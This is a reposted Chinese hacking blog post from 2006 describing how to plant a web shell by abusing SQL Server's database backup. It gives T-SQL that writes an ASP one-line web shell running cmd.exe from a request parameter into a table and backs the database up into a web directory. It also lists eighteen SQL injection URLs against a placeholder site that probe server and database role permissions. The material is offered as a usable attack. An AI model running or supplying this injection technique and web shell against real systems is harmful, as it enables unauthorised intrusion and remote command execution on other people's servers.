备份SQL数据库得到shell的方法:

转载 2006年05月18日 14:49:00


    动画种这种备份的方法来源于n.e.v.e.r的发明

使用语句为:
use model
create table cmd (str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='虚拟目录的实际物理目录';

 


这个方法对数据库角色的权限要求很低,应当有db_backupoperator权限就可以了。
附上判断数据库权限的语句:(1-8是服务器角色权限,9-18是数据库角色权限判断,具体什么权限你找本书看看吧。
语句1:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
语句2:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
语句3:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
语句5:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_owner'));--
语句10:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_accessadmin'));--
语句11:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_addadmin'));--
语句12:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_addladmin'));-- 
语句13:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_securityadmin'));--
语句14:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_backupoperator'));--
语句15:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_datareader'));--
语句16:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_datawriter'));--
语句17:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_denydatareader'));--
语句18:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_denydadawriter'));--     

动画结束语引用n.e.v.e.r的<<Backup a shell>>中的一段原话:
 “本来这也不是什么大不了的东西,但是我写了还没有贴出来的时候,有一天QQ上居然有人神神秘秘地把这篇文章传给了我,隔了不久又有人送了我一个这方面的工具!我好感动哦,5555555~
    我也不追问他们是哪里得来的了,我给过的就几个,总是这样子传出去的吧。反正大家都知道,也没有什么好保留的,于是在黑防四期上骗了点钱,过程就是这样。”

LCX来说两句,好像n.e.v.e.r对这事公开很生气,我再做个动画,哈哈。。。。
其实asp代码写在exe里改后缀也是可以执行的。。。。。

相关文章推荐

sql数据库自动备份方法

SQL Server 2005/2008 用户数据库文件默认路径和默认备份路径修改方法

以下仅为参照,如果有多个实例,可能会有些许不同: 本环境是SQL Server 2005 Standard Version 64-bit 和 SQL Server 2008 Standard Ver...
  • ksy
  • ksy
  • 2012-04-24 10:11
  • 1008

基于PL/SQL的数据库备份方法

 PL/SQL Developer是Oracle数据库中用于导入或导出数据库的主要工具,本文主要介绍了利用PL/SQL Developer导入和导出数据库的过程,并对导入或导出时的一些注意事项进...

基于PL/SQL的数据库备份方法

PL/SQL Developer是Oracle数据库中用于导入或导出数据库的主要工具,本文主要介绍了利用PL/SQL Developer导入和导出数据库的过程,并对导入或导出时的一些注意事项进行了说明...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)